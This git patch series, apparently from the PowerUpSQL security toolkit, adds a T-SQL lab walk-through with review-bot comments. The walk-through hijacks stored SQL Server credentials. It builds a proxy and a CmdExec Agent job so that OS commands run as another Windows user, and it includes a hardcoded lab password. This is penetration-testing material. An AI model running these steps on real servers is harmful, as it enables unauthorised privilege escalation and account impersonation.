From 99bace0f3d397bb5b1d1ff35250d186d002114ca Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 09:57:36 -0500
Subject: [PATCH 01/15] Create Get-AgentCredentialList.tsql
---
 templates/tsql/Get-AgentCredentialList.tsql | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 templates/tsql/Get-AgentCredentialList.tsql
diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql
new file mode 100644
index 0000000..fd07fcf
--- /dev/null
+++ b/templates/tsql/Get-AgentCredentialList.tsql
@@ -0,0 +1,14 @@
+// Get list of credentials used by agent jobs.
+
+USE msdb;
+GO
+
+SELECT
+j.name AS JobName,
+s.step_id AS StepID,
+s.step_name AS StepName,
+c.name AS CredentialName
+FROM sysjobs j
+JOIN sysjobsteps s ON j.job_id = s.job_id
+LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id
+WHERE c.name IS NOT NULLORDER BY j.name, s.step_id;
From df85ef80a0ec9f97c498444470363adb71eafb61 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 09:58:19 -0500
Subject: [PATCH 02/15] Update Get-AgentCredentialList.tsql
---
 templates/tsql/Get-AgentCredentialList.tsql | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql
index fd07fcf..9507d1a 100644
--- a/templates/tsql/Get-AgentCredentialList.tsql
+++ b/templates/tsql/Get-AgentCredentialList.tsql
@@ -11,4 +11,5 @@ c.name AS CredentialName
 FROM sysjobs j
 JOIN sysjobsteps s ON j.job_id = s.job_id
 LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id
-WHERE c.name IS NOT NULLORDER BY j.name, s.step_id;
+WHERE c.name IS NOT NULL
+ORDER BY j.name, s.step_id;
From 7f0a9734098508361f18486a9b09512aed72636f Mon Sep 17 00:00:00 2001
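Review bot: The first line of Get-AgentCredentialList.tsql, `+// Get list of credentials used by agent jobs.`, uses `//`, which is not a comment delimiter in T-SQL, so the file fails to parse before the query ever runs; it should read `-- Get list of credentials used by agent jobs.`. The join `LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id` compares a proxy id with a credential id, which are different key spaces (the later query in Get-Credentials-Hijack.tsql, patch 12, joins `steps.proxy_id = proxies.proxy_id` and then `proxies.credential_id = credentials.credential_id`), so the credential names this script reports are unreliable; go through the proxy table instead, `JOIN dbo.sysproxies p ON s.proxy_id = p.proxy_id` followed by `LEFT JOIN sys.credentials c ON p.credential_id = c.credential_id`. With `WHERE c.name IS NOT NULL` the LEFT JOIN behaves as an inner join, so either write `INNER JOIN` or drop the filter if steps without a credential are meant to stay visible.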
From: Scott Sutherland
Date: Tue, 20 Aug 2024 10:03:19 -0500
Subject: [PATCH 03/15] Rename New-TempTableSample.sqk to New-TempTableSample.sql
---
 .../tsql/{New-TempTableSample.sqk => New-TempTableSample.sql} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename templates/tsql/{New-TempTableSample.sqk => New-TempTableSample.sql} (100%)
diff --git a/templates/tsql/New-TempTableSample.sqk b/templates/tsql/New-TempTableSample.sql
similarity index 100%
rename from templates/tsql/New-TempTableSample.sqk
rename to templates/tsql/New-TempTableSample.sql
From 40b1f88828957a5b5d05150d07c0d27949a79a2a Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 10:03:48 -0500
Subject: [PATCH 04/15] Rename Get-10MostExpressiveQueries.tsql to Get-10MostExpensiveQueries.tsql
---
 ...MostExpressiveQueries.tsql => Get-10MostExpensiveQueries.tsql} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename templates/tsql/{Get-10MostExpressiveQueries.tsql => Get-10MostExpensiveQueries.tsql} (100%)
diff --git a/templates/tsql/Get-10MostExpressiveQueries.tsql b/templates/tsql/Get-10MostExpensiveQueries.tsql
similarity index 100%
rename from templates/tsql/Get-10MostExpressiveQueries.tsql
rename to templates/tsql/Get-10MostExpensiveQueries.tsql
From 89e9c1dcf206f65628b6da2a64e277e5c63e02d4 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 10:29:47 -0500
Subject: [PATCH 05/15] Create Get-Credentials-HiJack-Process.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 74 ++++++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 templates/tsql/Get-Credentials-Hijack.tsql
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
new file mode 100644
index 0000000..dd1cfb8
--- /dev/null
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -0,0 +1,74 @@
+--------------------------
+-- Get List of Credentials
+--------------------------
+USE msdb;
+GO
+
+SELECT
+j.name AS JobName,
+s.step_id AS StepID,
+s.step_name AS StepName,
+c.name AS CredentialName
+FROM sysjobs j
+JOIN sysjobsteps s ON j.job_id = s.job_id
+LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id
+WHERE c.name IS NOT NULL
+ORDER BY j.name, s.step_id;
+
+--------------------------
+-- Create a Proxy Using the Target Credential
+--------------------------
+USE msdb;
+GO
+
+EXEC sp_add_proxy
+ @proxy_name = N'OSCommandProxy', -- Name of the proxy
+ @credential_name = N'MyCredential'; -- Name of the existing credential
+
+EXEC sp_grant_proxy_to_subsystem
+ @proxy_name = N'OSCommandProxy',
+ @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem
+
+--------------------------
+-- Create the SQL Server Agent Job Configured to use the Proxy Account
+--------------------------
+
+USE msdb;
+GO
+
+-- Create the job
+EXEC sp_add_job
+ @job_name = N'WhoAmIJob'; -- Name of the job
+
+-- Add a job step that uses the proxy to execute the whoami command
+EXEC sp_add_jobstep
+ @job_name = N'WhoAmIJob',
+ @step_name = N'ExecuteWhoAmI',
+ @subsystem = N'CmdExec', -- Specifies an Operating System command
+ @command = N'whoami', -- The OS command to execute
+ @on_success_action = 1, -- 1 = Quit with success
+ @on_fail_action = 2, -- 2 = Quit with failure
+ @proxy_name = N'OSCommandProxy'; -- The proxy created earlier
+
+-- Add a schedule to the job (optional, can be manual or scheduled)
+EXEC sp_add_jobschedule
+ @job_name = N'WhoAmIJob',
+ @name = N'RunOnce',
+ @freq_type = 1, -- 1 = Once
+ @active_start_date = 20240820, -- Start date (YYYYMMDD)
+ @active_start_time = 120000; -- Start time (HHMMSS)
+
+-- Add the job to the SQL Server Agent
+EXEC sp_add_jobserver
+ @job_name = N'WhoAmIJob',
+ @server_name = N'(LOCAL)'; -- The server where the job will run
+
+--------------------------
+-- Execute the Job
+--------------------------
+EXEC sp_start_job @job_name = N'WhoAmIJob';
+
+--------------------------
+-- Check the Output/Error
+--------------------------
+EXEC sp_help_jobhistory @job_name= N'WhoAmIJob';
From f5c58ce545722f241c99965bfb826cf8bc2c3179 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 11:28:12 -0500
Subject: [PATCH 06/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index dd1cfb8..8ee5086 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,3 +1,5 @@
+-- Pending testing
+
 --------------------------
 -- Get List of Credentials
 --------------------------
From e58084d55c94dfc6a52c62eeb09890870d8e1e2a Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 11:53:14 -0500
Subject: [PATCH 07/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index 8ee5086..623f820 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,7 +1,12 @@
 -- Pending testing

 --------------------------
--- Get List of Credentials
+-- Get list of all credentials
+--------------------------
+select * from sys.credentials
+
+--------------------------
+-- Get List of Credentials - By Agent Jobs
 --------------------------
 USE msdb;
 GO
From 5081d438960a72c3672a10e4e636766376ecdf23 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:02:06 -0500
Subject: [PATCH 08/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 8 ++++++++
 1 file changed, 8 insertions(+)
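Review bot: The new file creates a proxy (`sp_add_proxy`), a job (`sp_add_job`), a schedule and a job-server mapping but has no teardown, so every run leaves these objects in msdb after the closing `EXEC sp_help_jobhistory` check, and a second run collides with the existing names. For a lab template that is meant to be re-run, add a final section after the history check that removes them, `EXEC sp_delete_job @job_name = N'WhoAmIJob';` and `EXEC sp_delete_proxy @proxy_name = N'OSCommandProxy';`, so the instance is returned to its prior state. The credential itself is referenced as pre-existing here (`-- Name of the existing credential`), so the cleanup comment should say it is intentionally left in place.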
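Review bot: `+select * from sys.credentials` is the only lowercase statement in a file that otherwise uppercases keywords, has no terminating semicolon, and uses `SELECT *` where the walk-through only needs a few columns. Writing it as `SELECT credential_id, name, credential_identity, create_date FROM sys.credentials;` keeps the output stable and readable next to the job listing that follows, and matches the style of the rest of the file.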
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index 623f820..88c0f5a 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,5 +1,13 @@
 -- Pending testing

+
+--------------------------
+-- Create a new credential named 'MyCredential'
+--------------------------
+CREATE CREDENTIAL [MyCredential]
+WITH IDENTITY = 'machinename\owusername',
+SECRET = 'P@ssw0rd!';
+
 --------------------------
 -- Get list of all credentials
 --------------------------
From f813c065cae41950a5eef93e0d72d9421464d0a9 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:05:22 -0500
Subject: [PATCH 09/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index 88c0f5a..5505842 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -2,12 +2,20 @@


 --------------------------
--- Create a new credential named 'MyCredential'
+-- Create a new credential named 'MyCredential' - for testing
 --------------------------
 CREATE CREDENTIAL [MyCredential]
-WITH IDENTITY = 'machinename\owusername',
+WITH IDENTITY = 'machinename\osusername',
 SECRET = 'P@ssw0rd!';

+EXEC sp_add_proxy
+ @proxy_name = N'MyCredentialProxy', -- Name of the proxy
+ @credential_name = N'MyCredential'; -- Name of the existing credential
+
+EXEC sp_grant_proxy_to_subsystem
+ @proxy_name = N'MyCredentialProxy',
+ @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem
+
 --------------------------
 -- Get list of all credentials
 --------------------------
From df25b1dae7ad5e3cbf0761b701a494319649d14b Mon Sep 17 00:00:00 2001
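Review bot: `+SECRET = 'P@ssw0rd!';` commits a literal password into a template, and `+WITH IDENTITY = 'machinename\owusername',` is a literal as well; use clearly marked placeholders for both, e.g. `WITH IDENTITY = '<machine>\<os-user>',` and `SECRET = '<lab-password>';` (constructed placeholders), so a reader has to substitute real values rather than create an OS-backed credential with a well-known password by copy-paste. Patch 14 later replaces the identity with `yourcomputernamehere\testuser` but keeps the secret literal, so that hunk inherits the same issue. A short comment above `CREATE CREDENTIAL [MyCredential]` noting that the credential is a server-level object that persists until removed with `DROP CREDENTIAL [MyCredential];` would also give a lab user the matching cleanup step.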
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:06:45 -0500
Subject: [PATCH 10/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 12 ++----------
 1 file changed, 2 insertions(+), 10 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index 5505842..f4a7bab 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -8,14 +8,6 @@ CREATE CREDENTIAL [MyCredential]
 WITH IDENTITY = 'machinename\osusername',
 SECRET = 'P@ssw0rd!';

-EXEC sp_add_proxy
- @proxy_name = N'MyCredentialProxy', -- Name of the proxy
- @credential_name = N'MyCredential'; -- Name of the existing credential
-
-EXEC sp_grant_proxy_to_subsystem
- @proxy_name = N'MyCredentialProxy',
- @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem
-
 --------------------------
 -- Get list of all credentials
 --------------------------
@@ -45,11 +37,11 @@ USE msdb;
 GO

 EXEC sp_add_proxy
- @proxy_name = N'OSCommandProxy', -- Name of the proxy
+ @proxy_name = N'MyCredentialProxy', -- Name of the proxy
 @credential_name = N'MyCredential'; -- Name of the existing credential

 EXEC sp_grant_proxy_to_subsystem
- @proxy_name = N'OSCommandProxy',
+ @proxy_name = N'MyCredentialProxy',
 @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem

 --------------------------
From a995179a3f976bb1db23a374817193e469b11ea0 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:08:30 -0500
Subject: [PATCH 11/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index f4a7bab..edfe981 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -44,6 +44,22 @@ EXEC sp_grant_proxy_to_subsystem
 @proxy_name = N'MyCredentialProxy',
 @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem

+--------------------------
+-- List Proxies
+--------------------------
+
+USE msdb;
+GO
+
+SELECT
+ proxy_id,
+ name AS proxy_name,
+ credential_id,
+ enabled
+FROM
+ dbo.sysproxies;
+GO
+
 --------------------------
 -- Create the SQL Server Agent Job Configured to use the Proxy Account
 --------------------------
@@ -63,7 +79,7 @@ EXEC sp_add_jobstep
 @command = N'whoami', -- The OS command to execute
 @on_success_action = 1, -- 1 = Quit with success
 @on_fail_action = 2, -- 2 = Quit with failure
- @proxy_name = N'OSCommandProxy'; -- The proxy created earlier
+ @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier

 -- Add a schedule to the job (optional, can be manual or scheduled)
 EXEC sp_add_jobschedule
From 43cddf4d08a17c789f2f5ba7c29527e6491742e9 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:20:19 -0500
Subject: [PATCH 12/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 45 ++++++++++++++--------
 1 file changed, 28 insertions(+), 17 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index edfe981..13e0733 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -13,23 +13,6 @@ SECRET = 'P@ssw0rd!';
 --------------------------
 select * from sys.credentials

---------------------------
--- Get List of Credentials - By Agent Jobs
---------------------------
-USE msdb;
-GO
-
-SELECT
-j.name AS JobName,
-s.step_id AS StepID,
-s.step_name AS StepName,
-c.name AS CredentialName
-FROM sysjobs j
-JOIN sysjobsteps s ON j.job_id = s.job_id
-LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id
-WHERE c.name IS NOT NULL
-ORDER BY j.name, s.step_id;
-
 --------------------------
 -- Create a Proxy Using the Target Credential
 --------------------------
@@ -94,6 +77,34 @@ EXEC sp_add_jobserver
 @job_name = N'WhoAmIJob',
 @server_name = N'(LOCAL)'; -- The server where the job will run

+--------------------------
+-- Get List of Proxy Account used by Agent Jobs
+-- Show job, step, proxy, cred, and identity
+--------------------------
+USE msdb;
+GO
+
+SELECT
+ jobs.name AS JobName,
+ steps.step_id AS StepID,
+ steps.step_name AS StepName,
+ proxies.name AS ProxyName,
+ ISNULL(credentials.name, 'No Credential') AS CredentialName,
+ ISNULL(credentials.credential_identity, 'No Identity') AS IdentityName
+FROM
+ msdb.dbo.sysjobs AS jobs
+JOIN
+ msdb.dbo.sysjobsteps AS steps ON jobs.job_id = steps.job_id
+JOIN
+ msdb.dbo.sysproxies AS proxies ON steps.proxy_id = proxies.proxy_id
+LEFT JOIN
+ sys.credentials AS credentials ON proxies.credential_id = credentials.credential_id
+WHERE
+ steps.proxy_id IS NOT NULL
+ORDER BY
+ jobs.name, steps.step_id;
+
+
 --------------------------
 -- Execute the Job
 --------------------------
From eec48d6a67fb93eb04a3297b8f8eabbe52b56522 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:29:45 -0500
Subject: [PATCH 13/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index 13e0733..d68cbea 100644
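Review bot: `WHERE steps.proxy_id IS NOT NULL` in the new listing query is redundant: the preceding `JOIN msdb.dbo.sysproxies AS proxies ON steps.proxy_id = proxies.proxy_id` is an inner join, so any step with a NULL proxy_id is already excluded; either drop the WHERE clause, or make that join a `LEFT JOIN` if steps without a proxy are meant to appear in the output. The two bare `JOIN` keywords should be spelled `INNER JOIN` to match the explicit `LEFT JOIN` on sys.credentials and make the intended semantics visible. Placing this listing between `sp_add_jobserver` and the `-- Execute the Job` section also splits the job-creation flow in two; it reads better next to the earlier proxy listing, before the job is created.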
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
@@ -1,5 +1,4 @@
--- Pending testing
-
+-- Tested and worked - SQL Server v2014 instance

 --------------------------
 -- Create a new credential named 'MyCredential' - for testing
@@ -59,7 +58,7 @@ EXEC sp_add_jobstep
 @job_name = N'WhoAmIJob',
 @step_name = N'ExecuteWhoAmI',
 @subsystem = N'CmdExec', -- Specifies an Operating System command
- @command = N'whoami', -- The OS command to execute
+ @command = N'c:\windows\system32\cmd.exe /c whoami > c:\temp\whoami.txt', -- The OS command to execute
 @on_success_action = 1, -- 1 = Quit with success
 @on_fail_action = 2, -- 2 = Quit with failure
 @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier
From d5250ebd5e5f8361692be97795866b5e851af061 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Tue, 20 Aug 2024 12:39:55 -0500
Subject: [PATCH 14/15] Update Get-Credentials-Hijack.tsql
---
 templates/tsql/Get-Credentials-Hijack.tsql | 78 ++++++++++++++++------
 1 file changed, 58 insertions(+), 20 deletions(-)
diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql
index d68cbea..2b1bb9d 100644
--- a/templates/tsql/Get-Credentials-Hijack.tsql
+++ b/templates/tsql/Get-Credentials-Hijack.tsql
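Review bot: The trailing comment on `+ @command = N'c:\windows\system32\cmd.exe /c whoami > c:\temp\whoami.txt',` still says `-- The OS command to execute` and no longer explains the change: the step now depends on `c:\temp` existing on the host (the redirect presumably fails the step otherwise) and leaves `c:\temp\whoami.txt` behind after the lab. Replace the comment with `-- Redirects whoami output to a file (presumably because the job history does not show it); c:\temp must exist, remove the file afterwards` and list the directory as a prerequisite in the setup summary that patch 14 adds. The enclosing `EXEC sp_add_jobstep` call starts before this hunk.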
@@ -1,20 +1,59 @@
 -- Tested and worked - SQL Server v2014 instance
-
---------------------------
--- Create a new credential named 'MyCredential' - for testing
---------------------------
+-- Author: Scott Sutherland @_nullbind (Twitter)
+
+-- #################################
+-- LAB SETUP SUMMARY
+--- #################################
+-- 1. Install local instance
+-- 2. Create local OS user named 'testuser'.
+-- 3. Log into SQL Server instance as a sysadmin and create credential.
+
+-- #################################
+-- LAB SETUP SUMMARY
+-- #################################
+-- 1. Log into the SQL Server instance as a sysadmin.
+-- 2. List credentials.
+-- 3. List proxy accounts.
+-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition.
+-- 4. Create Agent job that uses the proxy account.
+-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context.
+-- 6. Confirm execution by reviewing history.
+
+--- #################################
+-- Walk Through Below
+--- #################################
+
+----------------------------------------------------
+-- Create a new credential named 'MyCredential' for testing (for lab only)
+----------------------------------------------------
 CREATE CREDENTIAL [MyCredential]
-WITH IDENTITY = 'machinename\osusername',
+WITH IDENTITY = 'yourcomputernamehere\testuser',
 SECRET = 'P@ssw0rd!';

---------------------------
--- Get list of all credentials
---------------------------
+----------------------------------------------------
+-- Get a list of all credentials
+----------------------------------------------------
 select * from sys.credentials

---------------------------
--- Create a Proxy Using the Target Credential
---------------------------
+----------------------------------------------------
+-- Get a list proxies
+----------------------------------------------------
+USE msdb;
+GO
+
+SELECT
+ proxy_id,
+ name AS proxy_name,
+ credential_id,
+ enabled
+FROM
+ dbo.sysproxies;
+GO
+
+----------------------------------------------------
+-- Create a Proxy Using the Target Credential (if needed)
+----------------------------------------------------
+
 USE msdb;
 GO

@@ -26,10 +65,9 @@ EXEC sp_grant_proxy_to_subsystem
 @proxy_name = N'MyCredentialProxy',
 @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem

---------------------------
--- List Proxies
---------------------------
-
+----------------------------------------------------
+-- Get a list proxies - again
+----------------------------------------------------
 USE msdb;
 GO

@@ -42,9 +80,9 @@ FROM
 dbo.sysproxies;
 GO

---------------------------
+----------------------------------------------------
 -- Create the SQL Server Agent Job Configured to use the Proxy Account
---------------------------
+----------------------------------------------------

 USE msdb;
 GO
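Review bot: The new header block has two sections both titled `-- LAB SETUP SUMMARY`, although the second one lists the walk-through steps rather than setup, and that second list numbers two items `3.`; give the second block a title that distinguishes it from the first and renumber `-- 3. Create proxy account ...` through `-- 6.` as 4 to 7. The separator lines mix `--- ####` and `-- ####` (three dashes versus two) in this hunk; both are valid T-SQL comments, but the inconsistency reads as a typo, so use `-- ####` throughout. `doesnt` in the proxy-account item should be `doesn't`. The same hunk keeps ` SECRET = 'P@ssw0rd!';` as a literal next to the new `yourcomputernamehere\testuser` placeholder, so a placeholder for the secret would complete the change.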
@@ -76,10 +114,11 @@ EXEC sp_add_jobserver
 @job_name = N'WhoAmIJob',
 @server_name = N'(LOCAL)'; -- The server where the job will run

---------------------------
+----------------------------------------------------
 -- Get List of Proxy Account used by Agent Jobs
 -- Show job, step, proxy, cred, and identity
---------------------------
+----------------------------------------------------
+
 USE msdb;
 GO

@@ -103,7 +142,6 @@ WHERE
 ORDER BY
 jobs.name, steps.step_id;

-
 --------------------------
 -- Execute the Job
 --------------------------
From 7d73373b0751b8648a800fbeef4c00ced66eba58 Mon Sep 17 00:00:00 2001
From: Scott Sutherland
Date: Thu, 12 Dec 2024 12:09:39 -0600
Subject: [PATCH 15/15] Update LICENSE
---
 LICENSE | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/LICENSE b/LICENSE
index aa9b85b..44d5389 100644
--- a/LICENSE
+++ b/LICENSE
@@ -2,7 +2,7 @@ PowerUpSQL is provided under the 3-clause BSD license below.
 *************************************************************
-Copyright (c) 2022, NetSPI
+Copyright (c) 2024, NetSPI
 All rights reserved.
 Redistribution and use in source and binary forms, with or without